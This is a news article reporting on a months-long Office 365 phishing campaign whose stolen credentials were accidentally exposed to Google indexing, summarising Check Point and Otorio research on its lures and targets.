One of the best way to store information so they can be retrieved remotely, is by putting them on the internet.
Hackers do that too, as when they possess valuable stolen user data, they also want that data to be easily shared to those they want to share it with.
In a massive phishing campaign that has been running for more than half a year using dozens of domains, hackers have been stealing sensitive information from organizations worldwide, by making fraudulent Microsoft Office 365 login requests.
The campaign has been successful in bypassing email protection filters and collected at least 1,000 login credentials for corporate Office 365 accounts.
The hackers have also compromised legitimate WordPress servers to host malicious PHP pages and delivered them to victims.
But unfortunately for the hackers, they forgot to protect their loot.
Since anything placed on the web will have an address, the blunder in protecting the URL allowed Google Search to crawl and index the stolen passwords for the public internet.
In a blog post, the researchers at cybersecurity companies Check Point and Otorio said that:
They said that the hackers exfiltrated the information to domains they had registered specifically for the job.
However, they made a mistake when they put the data in a publicly visible file that Google can index.
As a result, Google Search that is always deploying its crawlers to scan the web for new information, discovered this stash, and made them show on its search engine results page for queries of a stolen email address or password.
"Attackers usually prefer to use compromised servers instead of their own infrastructure because of the existing websites’ well-known reputations," the researchers explain.
Upon closer look from about 500 entries, the researchers found that the most prevalent targets of the phishing attacks were companies in the construction, energy, and IT sectors.
According to the researchers, the hackers used several phishing email themes to lure potential victims into loading the fraudulent landing pages that were specifically made to collect their Microsoft Office 365 username and password.
To make the phishing emails look legitimate and personalized, the hackers crafted them to include the target's first name or company title in the subject line, and purported to deliver a Xerox scan notification in HTML format.
When the attachment is opened in a web browser, a blurred image is overlaid by a fake Microsoft Office 365 login form. During this time, a JavaScript code runs in the background to check the validity of the credentials as the victims type.
If victims enter their correct login credential, the data will be sent to the hackers' servers, and that page will redirects the victims to the legitimate Office 365 login page as a distraction.
To keep the campaign undetected, the hackers used compromised email accounts to distribute the fraudulent messages.
While the hackers behind this campaign aren't known, the blunder in protecting the stolen data simply thwarted their months-long actions.